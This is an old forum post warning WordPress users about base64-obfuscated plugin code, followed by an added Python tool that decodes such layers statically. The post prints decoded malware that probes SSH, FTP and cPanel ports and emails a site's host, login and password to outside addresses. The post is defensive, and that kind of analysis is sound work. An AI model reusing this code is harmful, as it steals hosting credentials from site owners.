12-06-2013, 02:01 PM
I use this method to check base64 code found in a lot of WordPress plugins and scripts. A free plugin called plugin check will analyze your installed plugins and let you know if there's any base64 code, and the location of the code. Go to the code location in the plugins editor section of your WordPress dashboard. Copy the base64 code. Go to http://www.unphp.net/ and paste the code in the decoder. Read the result. Here's the result from a plugin I downloaded on another forum. I apologize, I don't remember the plugin, but here's what I got. The base64 code was:
Here is what unphp.net decoded:
$domain = $_SERVER['HTTP_HOST'];
$p21 = 21;
$p22 = 22;
$p2082 = 2082;
$cp22 = fsockopen($domain,$p22,$errno,$errstr,10);
$cp21 = fsockopen($domain,$p21,$errno,$errstr,10);
$cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10);
if(!$cp22)
{$a1="Error";}
else
{$a1="Success";fclose($cp22);}
if(!$cp21)
{$a2="Error";}
else
{$a2="Success";fclose($cp21);}
if(!$cp2082)
{$a3="Error";}
else
{$a3="Success";fclose($cp2082);}
$psn ="
-------------------------------------------------------------------------
Cpanel Update Info [ Recode by Mask_magicianZ ]
-------------------------------------------------------------------------
Host : $domain
User : $login
Pass : $pass
-------------------------------------------------------------------------
Accept Port
SSH : Port $a1
FTP : Port $a2
cPanel : Port $a3
-------------------------------------------------------------------------
. 2011 Mask_magicianz Powered by RosebanditZ
-------------------------------------------------------------------------
";
$to = "quantum.princes@yahoo.com";
$recip = "john.cpbox@yahoo.com";
$subject = "cPanel AccesS Update";
$headers = "From: update";
mail($to,$subject,$psn,$headers);
mail($recip,$subject,$psn,$headers);
As you can see, this code was designed to take your password, user login, and your domain URL, and email it to the email above. Wow. Anyway, I'm sure you seasoned vets already know about this, but us newbies can fall prey to it. Beware, check everything.
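The same decoding step done offline, as an added example that is not part of the original post: it statically peels eval(gzinflate(base64_decode('...'))) layers (plus the gzuncompress and gzdecode variants, a generalization beyond the post) without executing anything, then lists calls worth reviewing. The function names, the SUSPICIOUS list and the sample payload are constructed for illustration.

```python
import base64
import re
import zlib

# PHP wrapper name -> zlib wbits value that reads the same compressed format.
WRAPPERS = {"gzinflate": -15, "gzuncompress": 15, "gzdecode": 31}
PACKED = re.compile(
    r"eval\s*\(\s*(gzinflate|gzuncompress|gzdecode)\s*\(\s*base64_decode\s*\(\s*"
    r"(['\"])([A-Za-z0-9+/=\s]+)\2\s*\)\s*\)\s*\)\s*;?"
)
# Illustrative (not exhaustive) list of calls to review once the text is readable.
SUSPICIOUS = ("mail(", "fsockopen(", "curl_exec(", "file_put_contents(", "$_SERVER")


def unpack(php_source, max_layers=10):
    """Statically peel eval(gz*(base64_decode('...'))) layers; nothing is executed."""
    text, layers = php_source, 0
    while layers < max_layers:
        match = PACKED.search(text)
        if not match:
            break
        try:
            raw = base64.b64decode(match.group(3))
            inner = zlib.decompress(raw, WRAPPERS[match.group(1)])
        except (ValueError, zlib.error):
            break  # malformed blob: stop and leave the rest for manual review
        text = text[:match.start()] + inner.decode("utf-8", "replace") + text[match.end():]
        layers += 1
    return text, layers


def flag(decoded):
    """Return the suspicious calls that appear in the decoded text."""
    return [s for s in SUSPICIOUS if s in decoded]


def pack(php_code, wrapper="gzinflate"):
    """Build a constructed test sample in the same wrapped shape."""
    c = zlib.compressobj(wbits=WRAPPERS[wrapper])
    blob = base64.b64encode(c.compress(php_code.encode()) + c.flush()).decode()
    return f"eval({wrapper}(base64_decode('{blob}')));"


# Constructed sample: a harmless stand-in payload wrapped in two layers.
PAYLOAD = '$h = $_SERVER["HTTP_HOST"]; mail("ops@example.invalid", "s", $h);'
SAMPLE = "<?php " + pack(pack(PAYLOAD), "gzuncompress")

if __name__ == "__main__":
    print(unpack(SAMPLE), flag(unpack(SAMPLE)[0]))
```

To check a real plugin file, pass its contents to unpack() and read the returned text before trusting the plugin.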